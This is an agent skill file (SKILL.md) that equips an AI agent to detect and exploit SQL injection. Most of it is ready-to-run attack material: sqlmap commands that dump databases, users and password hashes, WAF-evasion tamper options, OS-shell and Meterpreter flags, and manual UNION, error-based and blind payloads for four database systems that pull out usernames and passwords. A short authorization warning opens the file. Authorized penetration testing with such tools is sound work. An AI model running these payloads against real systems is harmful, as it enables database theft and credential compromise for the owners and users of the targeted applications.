exploit-sqli - SKILL.md Agent Skill

name: exploit-sqli description: SQL injection detection and exploitation using sqlmap, manual techniques, and custom payloads. Use this skill when user needs to test for SQL injection vulnerabilities, extract database information, or exploit SQLi in parameters, headers, or cookies.

SQL Injection Detection & Exploitation

Authorization Warning

DANGER: SQL injection testing can damage or destroy data in production databases. Always ensure you have:

Written permission from the target application owner
Isolated testing environment
Backups of affected systems
Legal compliance with local regulations

Never test SQL injection on production databases without authorization.

Prerequisites

Required tools that must be installed on your system:

sqlmap - pip install sqlmap or git clone https://github.com/sqlmapproject/sqlmap

Optional tools:

BBQSQL - Semi-automated SQL injection tool
NoSQLMap - NoSQL injection testing

Quick Start

Most commonly used commands for SQL injection testing:

Automated SQLMap Scan

sqlmap -u "https://target.com/page?id=1"

POST Request Testing

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

Cookie Testing

sqlmap -u "https://target.com" --cookie="sessionid=abc123"

Common Scenarios

Scenario 1: Basic Parameter Testing

When you need to test a URL parameter for SQL injection:

sqlmap -u "https://target.com/page?id=1"

Parameters:

-u - Target URL
-p - Specific parameter to test (default: all)
--batch - Avoid interactive prompts
--random-agent - Use random User-Agent

Example:

sqlmap -u "https://target.com/vuln.php?id=1" --batch --random-agent

Scenario 2: POST Request Injection

When you need to test POST body parameters:

sqlmap -u "https://target.com/login" --data="username=admin&password=test"

From file:

sqlmap -u "https://target.com/login" -d post_data.txt

Scenario 3: Cookie/Header Injection

When you need to test cookies or headers:

# Cookie injection
sqlmap -u "https://target.com" --cookie="sessionid=abc123"

# User-Agent injection
sqlmap -u "https://target.com" --headers="User-Agent: sqlmap"

# Referer injection
sqlmap -u "https://target.com" --referer="https://evil.com"

Multiple headers:

sqlmap -u "https://target.com" -H "Cookie:id=1" -H "User-Agent: test"

Scenario 4: Specific DBMS Testing

When you know or suspect the database type:

sqlmap -u "https://target.com/page?id=1" --dbms=mysql
sqlmap -u "https://target.com/page?id=1" --dbms=postgresql
sqlmap -u "https://target.com/page?id=1" --dbms=sqlserver
sqlmap -u "https://target.com/page?id=1" --dbms=oracle

Scenario 5: Database Enumeration

When you need to extract database information:

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

# List tables
sqlmap -u "https://target.com/page?id=1" -D dbname --tables

# Dump table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump

# Dump all
sqlmap -u "https://target.com/page?id=1" --dump-all

Scenario 6: User Enumeration

When you need to extract user credentials:

# Enumerate database users
sqlmap -u "https://target.com/page?id=1" --users

# Extract password hashes
sqlmap -u "https://target.com/page?id=1" --passwords

# Dump users table
sqlmap -u "https://target.com/page?id=1" -D dbname -T users -C username,password --dump

Scenario 7: Union-Based SQL Injection

Manual testing for Union-based SQLi:

# Test for SQL injection with payload
https://target.com/page?id=1' OR '1'='1
https://target.com/page?id=1' UNION SELECT 1,2,3--
https://target.com/page?id=1' UNION SELECT NULL,version(),NULL--

Determine column count:

id=1' ORDER BY 1--
id=1' ORDER BY 2--
id=1' ORDER BY 3--

Check for string vs integer:

id=1' UNION SELECT 1,'2',3--
id=1' UNION SELECT 1,NULL,NULL--

Scenario 8: Error-Based SQL Injection

When error messages are displayed:

# MySQL error injection
id=1' AND extractvalue(1, concat(0x7e, database(), 0x7e))--
id=1' AND updatexml(1, concat(0x7e, database(), 0x7e), 1)--
id=1' AND exp(~(SELECT * FROM (SELECT database())a))--

# PostgreSQL error injection
id=1' AND cast(version() as int)--
id=1'; CAST(version() AS INT)--

Scenario 9: Blind SQL Injection

When no error messages are returned:

Boolean-based:

id=1' AND 1=1--
id=1' AND 1=2--

Time-based (MySQL):

id=1' AND SLEEP(5)--
id=1' AND BENCHMARK(5000000, MD5(1))--

Time-based (PostgreSQL):

id=1'; SELECT pg_sleep(5)--
id=1'; SELECT extract(epoch from now())-

Scenario 10: WAF Evasion

When WAF blocks injection attempts:

# Use tamper scripts
sqlmap -u "https://target.com/page?id=1" --tamper=space2comments

# Use random agent
sqlmap -u "https://target.com/page?id=1" --random-agent

# Different level
sqlmap -u "https://target.com/page?id=1" --level=1 --risk=1

# Specific technique
sqlmap -u "https://target.com/page?id=1" --technique=U

Injection Testing Workflow

1. Initial Detection

# Automated scan
sqlmap -u "https://target.com/page?id=1" --batch

# Manual quick test
curl "https://target.com/page?id=1'" | grep -i "sql\|mysql\|syntax"
curl "https://target.com/page?id=1\" OR \"1\"=\"2" | grep -i "error"

2. Confirmation

# Confirm with multiple payloads
curl "https://target.com/page?id=1 AND 1=1"
curl "https://target.com/page?id=1 AND 1=2"
curl "https://target.com/page?id=1' OR '1'='1"

3. Fingerprint Database

sqlmap -u "https://target.com/page?id=1" --current-user

4. Enumeration

# Get database info
sqlmap -u "https://target.com/page?id=1" --hostname --current-db --is-dba

# List databases
sqlmap -u "https://target.com/page?id=1" --dbs

SQLMap Options Reference

Option	Description
`-u`	Target URL
`-r`	Parse log file
`-l`	Load from file
`-m`	Scan multiple targets
`-p`	Test specific parameters
`--skip`	Skip parameters
`--dbms`	Force DBMS
`--os`	Force OS
`--tamper`	Tamper script
`--level`	Test level (1-5)
`--risk`	Risk level (1-3)
`--technique`	Specific technique (B/E/U/S/T)
`--batch`	Non-interactive
`--random-agent`	Random User-Agent
`--proxy`	Use proxy
`--delay`	Delay between requests
`--timeout`	Request timeout
`--retries`	Retry attempts
`--string`	Match string
`--not-string`	Not match string
`--regexp`	Regexp filter
`--grep`	Regexp filter for pages
`--crawl`	Crawl site
`--forms`	Parse forms
`--cookie`	Cookie value
`--headers`	Extra headers
`--user-agent`	Custom User-Agent
`--method`	Force method
`--data`	POST data
`-d`	POST data from file
`--dbs`	Enumerate databases
`--tables`	Enumerate tables
`--columns`	Enumerate columns
`--schema`	Enumerate schema
`--dump`	Dump data
`--dump-all`	Dump all
`--search`	Search
`--users`	Enumerate DB users
`--passwords`	Enumerate password hashes
`--priv-esc`	Privilege escalation
`--os-shell`	OS shell
`--os-pwn`	Meterpreter/OBM shell
`--sql-shell`	SQL shell
`--wizard`	Wizard mode
`-v`	Verbosity (0-6)

Manual Payloads

MySQL Payloads

-- Version detection
' UNION SELECT @@version--

-- Current user
' UNION SELECT user()--

-- Current database
' UNION SELECT database()--

-- All databases
' UNION SELECT schema_name FROM information_schema.schemata--

-- Tables from database
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--

-- Columns from table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Concatenate data
' UNION SELECT CONCAT(username,0x3a,password) FROM users--

PostgreSQL Payloads

-- Version
' UNION SELECT version()--

-- Current user
' UNION SELECT user--

-- Current database
' UNION SELECT current_database()--

-- All databases
' UNION SELECT datname FROM pg_database--

-- Tables
' UNION SELECT tablename FROM pg_tables WHERE schemaname='public'--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

SQL Server Payloads

-- Version
' UNION SELECT @@version--

-- Database
' UNION SELECT DB_NAME()--

-- Tables
' UNION SELECT table_name FROM information_schema.tables--

-- Columns
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

-- Databases
' UNION SELECT name FROM master..sysdatabases--

Oracle Payloads

-- Version
' UNION SELECT banner FROM v$version--

-- Tables
' UNION SELECT table_name FROM all_tables WHERE owner=USER--

-- Columns
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--

Testing Checklist

URL parameters
POST parameters
Cookies
User-Agent
Referer
X-Forwarded-For
Accept headers
JSON body fields
GraphQL queries
API endpoints

Scenario: Persistent Storage of SQL Injection Findings

When you need to persist SQL injection findings to the database:

# Manual entry after discovering SQL injection
python .claude/skills/exploit-sqli/scripts/sqli_storage.py \
  --host-ip 192.168.1.100 \
  --url "https://example.com/login?id=1" \
  --parameter id \
  --payload "1' OR '1'='1" \
  --severity Critical \
  --cvss-score 9.8 \
  --db-type MySQL \
  --subsystem "Web Application"

Parameters:

--host-ip - Target host IP (required)
--url - Vulnerable URL (required)
--parameter - Vulnerable parameter name (required)
--payload - Payload used (required)
--severity - Severity level (default: High)
--cvss-score - CVSS score (0.0-10.0)
--db-type - Database type (e.g., MySQL, PostgreSQL)
--subsystem - Subsystem name (optional)
--title - Vulnerability title (auto-generated if not specified)
--description - Vulnerability description

Database location: ./data/results.db

Related skills: results-storage - Query data, generate reports

Resources

Scripts

scripts/sqli_payload_generator.py - Generate SQL injection payloads
scripts/boolean_sqli_tester.py - Test blind SQL injection
scripts/response_analyzer.py - Analyze responses for injection clues

References

references/sqlmap_guide.md - Comprehensive SQLMap reference
references/manual_sqli_techniques.md - Manual injection techniques
references/nosql_injection.md - NoSQL injection guide

Assets

assets/common_error_payloads.txt - Common error-based payloads
assets/time-based_payloads.txt - Time-based blind payloads
assets/dbms_fingerprints.txt - Database fingerprinting patterns